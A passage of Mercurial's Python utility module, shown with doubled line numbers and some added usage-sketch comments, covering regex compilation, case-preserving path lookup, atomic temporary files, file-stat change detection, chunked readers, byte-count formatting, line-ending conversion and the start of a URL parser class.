1804 1804 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1805 1805 if flags & remod.IGNORECASE:
1806 1806 pat = '(?i)' + pat
1807 1807 if flags & remod.MULTILINE:
1808 1808 pat = '(?m)' + pat
1809 1809 try:
1810 1810 return re2.compile(pat)
1811 1811 except re2.error:
1812 1812 pass
1813 1813 return remod.compile(pat, flags)
1814 1814
1815 1815 @propertycache
1816 1816 def escape(self):
1817 1817 '''Return the version of escape corresponding to self.compile.
1818 1818
1819 1819 This is imperfect because whether re2 or re is used for a particular
1820 1820 function depends on the flags, etc, but it's the best we can do.
1821 1821 '''
1822 1822 global _re2
1823 1823 if _re2 is None:
1824 1824 self._checkre2()
1825 1825 if _re2:
1826 1826 return re2.escape
1827 1827 else:
1828 1828 return remod.escape
1829 1829
1830 1830 re = _re()
1831 1831
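# Usage sketch for the module-level 're' shim above: compile() transparently
# prefers re2 when it is importable and only re2-compatible flags are used,
# and otherwise falls back to the stdlib engine with an identical interface.
#
#   pat = re.compile(br'^[a-f0-9]{40}$', remod.IGNORECASE)
#   pat.match(b'deadbeef' * 5)               # matches with either engine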
1832 1832 _fspathcache = {}
1833 1833 def fspath(name, root):
1834 1834 '''Get name in the case stored in the filesystem
1835 1835
1836 1836 The name should be relative to root, and be normcase-ed for efficiency.
1837 1837
1838 1838 Note that this function is unnecessary, and should not be
1839 1839 called, for case-sensitive filesystems (simply because it's expensive).
1840 1840
1841 1841 The root should be normcase-ed, too.
1842 1842 '''
1843 1843 def _makefspathcacheentry(dir):
1844 1844 return dict((normcase(n), n) for n in os.listdir(dir))
1845 1845
1846 1846 seps = pycompat.ossep
1847 1847 if pycompat.osaltsep:
1848 1848 seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # str.replace() returns a new string; keep the result or it is a no-op.
    seps = seps.replace('\\','\\\\')
1851 1851 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1852 1852 dir = os.path.normpath(root)
1853 1853 result = []
1854 1854 for part, sep in pattern.findall(name):
1855 1855 if sep:
1856 1856 result.append(sep)
1857 1857 continue
1858 1858
1859 1859 if dir not in _fspathcache:
1860 1860 _fspathcache[dir] = _makefspathcacheentry(dir)
1861 1861 contents = _fspathcache[dir]
1862 1862
1863 1863 found = contents.get(part)
1864 1864 if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
1867 1867 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1868 1868 found = contents.get(part)
1869 1869
1870 1870 result.append(found or part)
1871 1871 dir = os.path.join(dir, part)
1872 1872
1873 1873 return ''.join(result)
1874 1874
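# Worked example for fspath (on-disk spellings are hypothetical): with a
# case-insensitive filesystem storing 'Foo/BAR.txt' under root, the
# normcase-ed input is mapped back to the stored case, one cached
# os.listdir() per directory.
#
#   fspath(b'foo/bar.txt', b'/repo')         # -> 'Foo/BAR.txt'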
1875 1875 def checknlink(testfile):
1876 1876 '''check whether hardlink count reporting works properly'''
1877 1877
1878 1878 # testfile may be open, so we need a separate file for checking to
1879 1879 # work around issue2543 (or testfile may get lost on Samba shares)
1880 1880 f1, f2, fp = None, None, None
1881 1881 try:
1882 1882 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1883 1883 suffix='1~', dir=os.path.dirname(testfile))
1884 1884 os.close(fd)
1885 1885 f2 = '%s2~' % f1[:-2]
1886 1886
1887 1887 oslink(f1, f2)
1888 1888 # nlinks() may behave differently for files on Windows shares if
1889 1889 # the file is open.
1890 1890 fp = posixfile(f2)
1891 1891 return nlinks(f2) > 1
1892 1892 except OSError:
1893 1893 return False
1894 1894 finally:
1895 1895 if fp is not None:
1896 1896 fp.close()
1897 1897 for f in (f1, f2):
1898 1898 try:
1899 1899 if f is not None:
1900 1900 os.unlink(f)
1901 1901 except OSError:
1902 1902 pass
1903 1903
1904 1904 def endswithsep(path):
1905 1905 '''Check path ends with os.sep or os.altsep.'''
1906 1906 return (path.endswith(pycompat.ossep)
1907 1907 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1908 1908
1909 1909 def splitpath(path):
1910 1910 '''Split path by os.sep.
    Note that this function does not use os.altsep because it is meant
    as a simple alternative to "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
1915 1915 return path.split(pycompat.ossep)
1916 1916
1917 1917 def mktempcopy(name, emptyok=False, createmode=None):
1918 1918 """Create a temporary file with the same contents from name
1919 1919
1920 1920 The permission bits are copied from the original file.
1921 1921
1922 1922 If the temporary file is going to be truncated immediately, you
1923 1923 can use emptyok=True as an optimization.
1924 1924
1925 1925 Returns the name of the temporary file.
1926 1926 """
1927 1927 d, fn = os.path.split(name)
1928 1928 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1929 1929 os.close(fd)
1930 1930 # Temporary files are created with mode 0600, which is usually not
1931 1931 # what we want. If the original file already exists, just copy
1932 1932 # its mode. Otherwise, manually obey umask.
1933 1933 copymode(name, temp, createmode)
1934 1934 if emptyok:
1935 1935 return temp
1936 1936 try:
1937 1937 try:
1938 1938 ifp = posixfile(name, "rb")
1939 1939 except IOError as inst:
1940 1940 if inst.errno == errno.ENOENT:
1941 1941 return temp
1942 1942 if not getattr(inst, 'filename', None):
1943 1943 inst.filename = name
1944 1944 raise
1945 1945 ofp = posixfile(temp, "wb")
1946 1946 for chunk in filechunkiter(ifp):
1947 1947 ofp.write(chunk)
1948 1948 ifp.close()
1949 1949 ofp.close()
1950 1950 except: # re-raises
1951 1951 try:
1952 1952 os.unlink(temp)
1953 1953 except OSError:
1954 1954 pass
1955 1955 raise
1956 1956 return temp
1957 1957
1958 1958 class filestat(object):
1959 1959 """help to exactly detect change of a file
1960 1960
    'stat' attribute is the result of 'os.stat()' if the specified 'path'
    exists. Otherwise, it is None. This spares client code of this class
    a preparatory 'exists()' check.
1964 1964 """
1965 1965 def __init__(self, stat):
1966 1966 self.stat = stat
1967 1967
1968 1968 @classmethod
1969 1969 def frompath(cls, path):
1970 1970 try:
1971 1971 stat = os.stat(path)
1972 1972 except OSError as err:
1973 1973 if err.errno != errno.ENOENT:
1974 1974 raise
1975 1975 stat = None
1976 1976 return cls(stat)
1977 1977
1978 1978 @classmethod
1979 1979 def fromfp(cls, fp):
1980 1980 stat = os.fstat(fp.fileno())
1981 1981 return cls(stat)
1982 1982
1983 1983 __hash__ = object.__hash__
1984 1984
1985 1985 def __eq__(self, old):
1986 1986 try:
1987 1987 # if ambiguity between stat of new and old file is
1988 1988 # avoided, comparison of size, ctime and mtime is enough
1989 1989 # to exactly detect change of a file regardless of platform
1990 1990 return (self.stat.st_size == old.stat.st_size and
1991 1991 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1992 1992 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1993 1993 except AttributeError:
1994 1994 pass
1995 1995 try:
1996 1996 return self.stat is None and old.stat is None
1997 1997 except AttributeError:
1998 1998 return False
1999 1999
2000 2000 def isambig(self, old):
2001 2001 """Examine whether new (= self) stat is ambiguous against old one
2002 2002
2003 2003 "S[N]" below means stat of a file at N-th change:
2004 2004
2005 2005 - S[n-1].ctime < S[n].ctime: can detect change of a file
2006 2006 - S[n-1].ctime == S[n].ctime
2007 2007 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2008 2008 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2009 2009 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2010 2010 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2011 2011
        Case (*2) above means that a file was changed twice or more
        within the same second (= S[n-1].ctime), so comparison of
        timestamps is ambiguous.
2015 2015
2016 2016 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2017 2017 timestamp is ambiguous".
2018 2018
2019 2019 But advancing mtime only in case (*2) doesn't work as
2020 2020 expected, because naturally advanced S[n].mtime in case (*1)
2021 2021 might be equal to manually advanced S[n-1 or earlier].mtime.
2022 2022
        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        a change due to collision between such mtimes.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if the size of a file isn't changed.
2029 2029 """
2030 2030 try:
2031 2031 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2032 2032 except AttributeError:
2033 2033 return False
2034 2034
2035 2035 def avoidambig(self, path, old):
2036 2036 """Change file stat of specified path to avoid ambiguity
2037 2037
2038 2038 'old' should be previous filestat of 'path'.
2039 2039
2040 2040 This skips avoiding ambiguity, if a process doesn't have
2041 2041 appropriate privileges for 'path'. This returns False in this
2042 2042 case.
2043 2043
2044 2044 Otherwise, this returns True, as "ambiguity is avoided".
2045 2045 """
2046 2046 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2047 2047 try:
2048 2048 os.utime(path, (advanced, advanced))
2049 2049 except OSError as inst:
2050 2050 if inst.errno == errno.EPERM:
2051 2051 # utime() on the file created by another user causes EPERM,
2052 2052 # if a process doesn't have appropriate privileges
2053 2053 return False
2054 2054 raise
2055 2055 return True
2056 2056
2057 2057 def __ne__(self, other):
2058 2058 return not self == other
2059 2059
2060 2060 class atomictempfile(object):
2061 2061 '''writable file object that atomically updates a file
2062 2062
2063 2063 All writes will go to a temporary copy of the original file. Call
2064 2064 close() when you are done writing, and atomictempfile will rename
2065 2065 the temporary copy to the original name, making the changes
2066 2066 visible. If the object is destroyed without being closed, all your
2067 2067 writes are discarded.
2068 2068
    The checkambig argument of the constructor is used with filestat, and
    is useful only if the target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
2072 2072 '''
2073 2073 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2074 2074 self.__name = name # permanent name
2075 2075 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2076 2076 createmode=createmode)
2077 2077 self._fp = posixfile(self._tempname, mode)
2078 2078 self._checkambig = checkambig
2079 2079
2080 2080 # delegated methods
2081 2081 self.read = self._fp.read
2082 2082 self.write = self._fp.write
2083 2083 self.seek = self._fp.seek
2084 2084 self.tell = self._fp.tell
2085 2085 self.fileno = self._fp.fileno
2086 2086
2087 2087 def close(self):
2088 2088 if not self._fp.closed:
2089 2089 self._fp.close()
2090 2090 filename = localpath(self.__name)
2091 2091 oldstat = self._checkambig and filestat.frompath(filename)
2092 2092 if oldstat and oldstat.stat:
2093 2093 rename(self._tempname, filename)
2094 2094 newstat = filestat.frompath(filename)
2095 2095 if newstat.isambig(oldstat):
2096 2096 # stat of changed file is ambiguous to original one
2097 2097 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2098 2098 os.utime(filename, (advanced, advanced))
2099 2099 else:
2100 2100 rename(self._tempname, filename)
2101 2101
2102 2102 def discard(self):
2103 2103 if not self._fp.closed:
2104 2104 try:
2105 2105 os.unlink(self._tempname)
2106 2106 except OSError:
2107 2107 pass
2108 2108 self._fp.close()
2109 2109
2110 2110 def __del__(self):
2111 2111 if safehasattr(self, '_fp'): # constructor actually did something
2112 2112 self.discard()
2113 2113
2114 2114 def __enter__(self):
2115 2115 return self
2116 2116
2117 2117 def __exit__(self, exctype, excvalue, traceback):
2118 2118 if exctype is not None:
2119 2119 self.discard()
2120 2120 else:
2121 2121 self.close()
2122 2122
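# Typical use of atomictempfile as a context manager (path and payload are
# illustrative): readers never observe a partial write, because the temporary
# copy is renamed into place only on clean exit and discarded on error.
#
#   with atomictempfile('somefile', 'wb') as f:
#       f.write(b'new content')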
2123 2123 def unlinkpath(f, ignoremissing=False):
2124 2124 """unlink and remove the directory if it is empty"""
2125 2125 if ignoremissing:
2126 2126 tryunlink(f)
2127 2127 else:
2128 2128 unlink(f)
2129 2129 # try removing directories that might now be empty
2130 2130 try:
2131 2131 removedirs(os.path.dirname(f))
2132 2132 except OSError:
2133 2133 pass
2134 2134
2135 2135 def tryunlink(f):
2136 2136 """Attempt to remove a file, ignoring ENOENT errors."""
2137 2137 try:
2138 2138 unlink(f)
2139 2139 except OSError as e:
2140 2140 if e.errno != errno.ENOENT:
2141 2141 raise
2142 2142
2143 2143 def makedirs(name, mode=None, notindexed=False):
2144 2144 """recursive directory creation with parent mode inheritance
2145 2145
2146 2146 Newly created directories are marked as "not to be indexed by
2147 2147 the content indexing service", if ``notindexed`` is specified
2148 2148 for "write" mode access.
2149 2149 """
2150 2150 try:
2151 2151 makedir(name, notindexed)
2152 2152 except OSError as err:
2153 2153 if err.errno == errno.EEXIST:
2154 2154 return
2155 2155 if err.errno != errno.ENOENT or not name:
2156 2156 raise
2157 2157 parent = os.path.dirname(os.path.abspath(name))
2158 2158 if parent == name:
2159 2159 raise
2160 2160 makedirs(parent, mode, notindexed)
2161 2161 try:
2162 2162 makedir(name, notindexed)
2163 2163 except OSError as err:
2164 2164 # Catch EEXIST to handle races
2165 2165 if err.errno == errno.EEXIST:
2166 2166 return
2167 2167 raise
2168 2168 if mode is not None:
2169 2169 os.chmod(name, mode)
2170 2170
2171 2171 def readfile(path):
2172 2172 with open(path, 'rb') as fp:
2173 2173 return fp.read()
2174 2174
2175 2175 def writefile(path, text):
2176 2176 with open(path, 'wb') as fp:
2177 2177 fp.write(text)
2178 2178
2179 2179 def appendfile(path, text):
2180 2180 with open(path, 'ab') as fp:
2181 2181 fp.write(text)
2182 2182
2183 2183 class chunkbuffer(object):
2184 2184 """Allow arbitrary sized chunks of data to be efficiently read from an
2185 2185 iterator over chunks of arbitrary size."""
2186 2186
2187 2187 def __init__(self, in_iter):
2188 2188 """in_iter is the iterator that's iterating over the input chunks."""
2189 2189 def splitbig(chunks):
2190 2190 for chunk in chunks:
2191 2191 if len(chunk) > 2**20:
2192 2192 pos = 0
2193 2193 while pos < len(chunk):
2194 2194 end = pos + 2 ** 18
2195 2195 yield chunk[pos:end]
2196 2196 pos = end
2197 2197 else:
2198 2198 yield chunk
2199 2199 self.iter = splitbig(in_iter)
2200 2200 self._queue = collections.deque()
2201 2201 self._chunkoffset = 0
2202 2202
2203 2203 def read(self, l=None):
2204 2204 """Read L bytes of data from the iterator of chunks of data.
2205 2205 Returns less than L bytes if the iterator runs dry.
2206 2206
        If the size parameter is omitted, read everything."""
2208 2208 if l is None:
2209 2209 return ''.join(self.iter)
2210 2210
2211 2211 left = l
2212 2212 buf = []
2213 2213 queue = self._queue
2214 2214 while left > 0:
2215 2215 # refill the queue
2216 2216 if not queue:
2217 2217 target = 2**18
2218 2218 for chunk in self.iter:
2219 2219 queue.append(chunk)
2220 2220 target -= len(chunk)
2221 2221 if target <= 0:
2222 2222 break
2223 2223 if not queue:
2224 2224 break
2225 2225
2226 2226 # The easy way to do this would be to queue.popleft(), modify the
2227 2227 # chunk (if necessary), then queue.appendleft(). However, for cases
2228 2228 # where we read partial chunk content, this incurs 2 dequeue
2229 2229 # mutations and creates a new str for the remaining chunk in the
2230 2230 # queue. Our code below avoids this overhead.
2231 2231
2232 2232 chunk = queue[0]
2233 2233 chunkl = len(chunk)
2234 2234 offset = self._chunkoffset
2235 2235
2236 2236 # Use full chunk.
2237 2237 if offset == 0 and left >= chunkl:
2238 2238 left -= chunkl
2239 2239 queue.popleft()
2240 2240 buf.append(chunk)
2241 2241 # self._chunkoffset remains at 0.
2242 2242 continue
2243 2243
2244 2244 chunkremaining = chunkl - offset
2245 2245
2246 2246 # Use all of unconsumed part of chunk.
2247 2247 if left >= chunkremaining:
2248 2248 left -= chunkremaining
2249 2249 queue.popleft()
2250 2250 # offset == 0 is enabled by block above, so this won't merely
2251 2251 # copy via ``chunk[0:]``.
2252 2252 buf.append(chunk[offset:])
2253 2253 self._chunkoffset = 0
2254 2254
2255 2255 # Partial chunk needed.
2256 2256 else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                # left < chunkremaining here, so this goes negative and
                # terminates the loop after the final partial read.
                left -= chunkremaining
2260 2260
2261 2261 return ''.join(buf)
2262 2262
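# Behavior sketch for chunkbuffer (values are illustrative): arbitrarily
# sized input chunks are consumed through fixed-size reads, with partial
# chunk consumption tracked via self._chunkoffset instead of re-slicing.
#
#   buf = chunkbuffer(iter([b'abc', b'defgh']))
#   buf.read(4)                              # -> 'abcd'
#   buf.read(10)                             # -> 'efgh' (iterator ran dry)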
2263 2263 def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file, size
    (default 131072) bytes at a time, up to the optional limit (default is
    to read all data). Chunks may be less than size bytes if the
2267 2267 chunk is the last chunk in the file, or the file is a socket or
2268 2268 some other type of file that sometimes reads less data than is
2269 2269 requested."""
2270 2270 assert size >= 0
2271 2271 assert limit is None or limit >= 0
2272 2272 while True:
2273 2273 if limit is None:
2274 2274 nbytes = size
2275 2275 else:
2276 2276 nbytes = min(limit, size)
2277 2277 s = nbytes and f.read(nbytes)
2278 2278 if not s:
2279 2279 break
2280 2280 if limit:
2281 2281 limit -= len(s)
2282 2282 yield s
2283 2283
2284 2284 class cappedreader(object):
2285 2285 """A file object proxy that allows reading up to N bytes.
2286 2286
2287 2287 Given a source file object, instances of this type allow reading up to
2288 2288 N bytes from that source file object. Attempts to read past the allowed
2289 2289 limit are treated as EOF.
2290 2290
2291 2291 It is assumed that I/O is not performed on the original file object
2292 2292 in addition to I/O that is performed by this instance. If there is,
2293 2293 state tracking will get out of sync and unexpected results will ensue.
2294 2294 """
2295 2295 def __init__(self, fh, limit):
2296 2296 """Allow reading up to <limit> bytes from <fh>."""
2297 2297 self._fh = fh
2298 2298 self._left = limit
2299 2299
2300 2300 def read(self, n=-1):
2301 2301 if not self._left:
2302 2302 return b''
2303 2303
2304 2304 if n < 0:
2305 2305 n = self._left
2306 2306
2307 2307 data = self._fh.read(min(n, self._left))
2308 2308 self._left -= len(data)
2309 2309 assert self._left >= 0
2310 2310
2311 2311 return data
2312 2312
2313 2313 def readinto(self, b):
2314 2314 res = self.read(len(b))
2315 2315 if res is None:
2316 2316 return None
2317 2317
2318 2318 b[0:len(res)] = res
2319 2319 return len(res)
2320 2320
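# Bounded-read sketch for cappedreader: the limit caps total consumption of
# the wrapped file object, and any read beyond it behaves like EOF.
#
#   capped = cappedreader(stringio(b'0123456789'), 4)
#   capped.read(8)                           # -> '0123' (clamped to limit)
#   capped.read()                            # -> '' (limit exhausted)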
2321 2321 def unitcountfn(*unittable):
2322 2322 '''return a function that renders a readable count of some quantity'''
2323 2323
2324 2324 def go(count):
2325 2325 for multiplier, divisor, format in unittable:
2326 2326 if abs(count) >= divisor * multiplier:
2327 2327 return format % (count / float(divisor))
2328 2328 return unittable[-1][2] % count
2329 2329
2330 2330 return go
2331 2331
2332 2332 def processlinerange(fromline, toline):
2333 2333 """Check that linerange <fromline>:<toline> makes sense and return a
2334 2334 0-based range.
2335 2335
2336 2336 >>> processlinerange(10, 20)
2337 2337 (9, 20)
2338 2338 >>> processlinerange(2, 1)
2339 2339 Traceback (most recent call last):
2340 2340 ...
2341 2341 ParseError: line range must be positive
2342 2342 >>> processlinerange(0, 5)
2343 2343 Traceback (most recent call last):
2344 2344 ...
2345 2345 ParseError: fromline must be strictly positive
2346 2346 """
2347 2347 if toline - fromline < 0:
2348 2348 raise error.ParseError(_("line range must be positive"))
2349 2349 if fromline < 1:
2350 2350 raise error.ParseError(_("fromline must be strictly positive"))
2351 2351 return fromline - 1, toline
2352 2352
2353 2353 bytecount = unitcountfn(
2354 2354 (100, 1 << 30, _('%.0f GB')),
2355 2355 (10, 1 << 30, _('%.1f GB')),
2356 2356 (1, 1 << 30, _('%.2f GB')),
2357 2357 (100, 1 << 20, _('%.0f MB')),
2358 2358 (10, 1 << 20, _('%.1f MB')),
2359 2359 (1, 1 << 20, _('%.2f MB')),
2360 2360 (100, 1 << 10, _('%.0f KB')),
2361 2361 (10, 1 << 10, _('%.1f KB')),
2362 2362 (1, 1 << 10, _('%.2f KB')),
2363 2363 (1, 1, _('%.0f bytes')),
2364 2364 )
2365 2365
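# Rendering sketch for bytecount: the first row of the table above whose
# threshold (multiplier * divisor) the value reaches wins, so displayed
# precision shrinks as magnitude grows.
#
#   bytecount(100)                           # -> '100 bytes'
#   bytecount(4096)                          # -> '4.00 KB'
#   bytecount(12345678)                      # -> '11.8 MB'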
2366 2366 class transformingwriter(object):
2367 2367 """Writable file wrapper to transform data by function"""
2368 2368
2369 2369 def __init__(self, fp, encode):
2370 2370 self._fp = fp
2371 2371 self._encode = encode
2372 2372
2373 2373 def close(self):
2374 2374 self._fp.close()
2375 2375
2376 2376 def flush(self):
2377 2377 self._fp.flush()
2378 2378
2379 2379 def write(self, data):
2380 2380 return self._fp.write(self._encode(data))
2381 2381
2382 2382 # Matches a single EOL which can either be a CRLF where repeated CR
2383 2383 # are removed or a LF. We do not care about old Macintosh files, so a
2384 2384 # stray CR is an error.
2385 2385 _eolre = remod.compile(br'\r*\n')
2386 2386
2387 2387 def tolf(s):
2388 2388 return _eolre.sub('\n', s)
2389 2389
2390 2390 def tocrlf(s):
2391 2391 return _eolre.sub('\r\n', s)
2392 2392
2393 2393 def _crlfwriter(fp):
2394 2394 return transformingwriter(fp, tocrlf)
2395 2395
2396 2396 if pycompat.oslinesep == '\r\n':
2397 2397 tonativeeol = tocrlf
2398 2398 fromnativeeol = tolf
2399 2399 nativeeolwriter = _crlfwriter
2400 2400 else:
2401 2401 tonativeeol = pycompat.identity
2402 2402 fromnativeeol = pycompat.identity
2403 2403 nativeeolwriter = pycompat.identity
2404 2404
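# Normalization sketch for the EOL helpers above: _eolre folds CR runs that
# precede a LF, so Windows line endings collapse cleanly while a lone CR is
# left untouched.
#
#   tolf(b'a\r\nb\r\r\nc')                   # -> 'a\nb\nc'
#   tocrlf(b'a\nb')                          # -> 'a\r\nb'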
2405 2405 if (pyplatform.python_implementation() == 'CPython' and
2406 2406 sys.version_info < (3, 0)):
2407 2407 # There is an issue in CPython that some IO methods do not handle EINTR
2408 2408 # correctly. The following table shows what CPython version (and functions)
2409 2409 # are affected (buggy: has the EINTR bug, okay: otherwise):
2410 2410 #
2411 2411 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2412 2412 # --------------------------------------------------
2413 2413 # fp.__iter__ | buggy | buggy | okay
2414 2414 # fp.read* | buggy | okay [1] | okay
2415 2415 #
2416 2416 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2417 2417 #
2418 2418 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2419 2419 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2420 2420 #
2421 2421 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2422 2422 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2423 2423 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2424 2424 # fp.__iter__ but not other fp.read* methods.
2425 2425 #
2426 2426 # On modern systems like Linux, the "read" syscall cannot be interrupted
2427 2427 # when reading "fast" files like on-disk files. So the EINTR issue only
2428 2428 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2429 2429 # files approximately as "fast" files and use the fast (unsafe) code path,
2430 2430 # to minimize the performance impact.
2431 2431 if sys.version_info >= (2, 7, 4):
2432 2432 # fp.readline deals with EINTR correctly, use it as a workaround.
2433 2433 def _safeiterfile(fp):
2434 2434 return iter(fp.readline, '')
2435 2435 else:
2436 2436 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2437 2437 # note: this may block longer than necessary because of bufsize.
2438 2438 def _safeiterfile(fp, bufsize=4096):
2439 2439 fd = fp.fileno()
2440 2440 line = ''
2441 2441 while True:
2442 2442 try:
2443 2443 buf = os.read(fd, bufsize)
2444 2444 except OSError as ex:
2445 2445 # os.read only raises EINTR before any data is read
2446 2446 if ex.errno == errno.EINTR:
2447 2447 continue
2448 2448 else:
2449 2449 raise
2450 2450 line += buf
2451 2451 if '\n' in buf:
2452 2452 splitted = line.splitlines(True)
2453 2453 line = ''
2454 2454 for l in splitted:
2455 2455 if l[-1] == '\n':
2456 2456 yield l
2457 2457 else:
2458 2458 line = l
2459 2459 if not buf:
2460 2460 break
2461 2461 if line:
2462 2462 yield line
2463 2463
2464 2464 def iterfile(fp):
2465 2465 fastpath = True
2466 2466 if type(fp) is file:
2467 2467 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2468 2468 if fastpath:
2469 2469 return fp
2470 2470 else:
2471 2471 return _safeiterfile(fp)
2472 2472 else:
2473 2473 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2474 2474 def iterfile(fp):
2475 2475 return fp
2476 2476
2477 2477 def iterlines(iterator):
2478 2478 for chunk in iterator:
2479 2479 for line in chunk.splitlines():
2480 2480 yield line
2481 2481
2482 2482 def expandpath(path):
2483 2483 return os.path.expanduser(os.path.expandvars(path))
2484 2484
2485 2485 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2486 2486 """Return the result of interpolating items in the mapping into string s.
2487 2487
2488 2488 prefix is a single character string, or a two character string with
2489 2489 a backslash as the first character if the prefix needs to be escaped in
2490 2490 a regular expression.
2491 2491
2492 2492 fn is an optional function that will be applied to the replacement text
2493 2493 just before replacement.
2494 2494
    escape_prefix is an optional flag that allows escaping the prefix
    character itself by doubling it.
2497 2497 """
2498 2498 fn = fn or (lambda s: s)
2499 2499 patterns = '|'.join(mapping.keys())
2500 2500 if escape_prefix:
2501 2501 patterns += '|' + prefix
2502 2502 if len(prefix) > 1:
2503 2503 prefix_char = prefix[1:]
2504 2504 else:
2505 2505 prefix_char = prefix
2506 2506 mapping[prefix_char] = prefix_char
2507 2507 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2508 2508 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2509 2509
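# Substitution sketch for interpolate() (mapping and input are illustrative):
# every prefixed key found in 's' is replaced through the mapping; note the
# regexp-escaped two-character prefix, as described in the docstring.
#
#   interpolate(br'\$', {b'user': b'alice'}, b'hi $user')   # -> 'hi alice'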
2510 2510 def getport(port):
2511 2511 """Return the port for a given network service.
2512 2512
2513 2513 If port is an integer, it's returned as is. If it's a string, it's
2514 2514 looked up using socket.getservbyname(). If there's no matching
2515 2515 service, error.Abort is raised.
2516 2516 """
2517 2517 try:
2518 2518 return int(port)
2519 2519 except ValueError:
2520 2520 pass
2521 2521
2522 2522 try:
2523 2523 return socket.getservbyname(pycompat.sysstr(port))
2524 2524 except socket.error:
2525 2525 raise error.Abort(_("no port number associated with service '%s'")
2526 2526 % port)
2527 2527
2528 2528 class url(object):
2529 2529 r"""Reliable URL parser.
2530 2530
2531 2531 This parses URLs and provides attributes for the following
2532 2532 components:
2533 2533
2534 2534 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2535 2535
2536 2536 Missing components are set to None. The only exception is
2537 2537 fragment, which is set to '' if present but empty.
2538 2538
2539 2539 If parsefragment is False, fragment is included in query. If
2540 2540 parsequery is False, query is included in path. If both are
2541 2541 False, both fragment and query are included in path.
2542 2542
2543 2543 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2544 2544
2545 2545 Note that for backward compatibility reasons, bundle URLs do not
2546 2546 take host names. That means 'bundle://../' has a path of '../'.
2547 2547
2548 2548 Examples:
2549 2549
2550 2550 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2551 2551 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2552 2552 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2553 2553 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2554 2554 >>> url(b'file:///home/joe/repo')
2555 2555 <url scheme: 'file', path: '/home/joe/repo'>
2556 2556 >>> url(b'file:///c:/temp/foo/')
2557 2557 <url scheme: 'file', path: 'c:/temp/foo/'>
2558 2558 >>> url(b'bundle:foo')
2559 2559 <url scheme: 'bundle', path: 'foo'>
2560 2560 >>> url(b'bundle://../foo')
2561 2561 <url scheme: 'bundle', path: '../foo'>
2562 2562 >>> url(br'c:\foo\bar')
2563 2563 <url path: 'c:\\foo\\bar'>
2564 2564 >>> url(br'\\blah\blah\blah')
2565 2565 <url path: '\\\\blah\\blah\\blah'>
2566 2566 >>> url(br'\\blah\blah\blah#baz')
2567 2567 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2568 2568 >>> url(br'file:///C:\users\me')
2569 2569 <url scheme: 'file', path: 'C:\\users\\me'>
2570 2570
2571 2571 Authentication credentials:
2572 2572
2573 2573 >>> url(b'ssh://joe:xyz@x/repo')
2574 2574 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2575 2575 >>> url(b'ssh://joe@x/repo')
2576 2576 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2577 2577
2578 2578 Query strings and fragments:
2579 2579
2580 2580 >>> url(b'http://host/a?b#c')
2581 2581 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2582 2582 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2583 2583 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2584 2584
2585 2585 Empty path:
2586 2586
2587 2587 >>> url(b'')
2588 2588 <url path: ''>
2589 2589 >>> url(b'#a')
2590 2590 <url path: '', fragment: 'a'>
2591 2591 >>> url(b'http://host/')
2592 2592 <url scheme: 'http', host: 'host', path: ''>
2593 2593 >>> url(b'http://host/#a')
2594 2594 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2595 2595
2596 2596 Only scheme:
2597 2597
2598 2598 >>> url(b'http:')
2599 2599 <url scheme: 'http'>
2600 2600 """
2601 2601
2602 2602 _safechars = "!~*'()+"
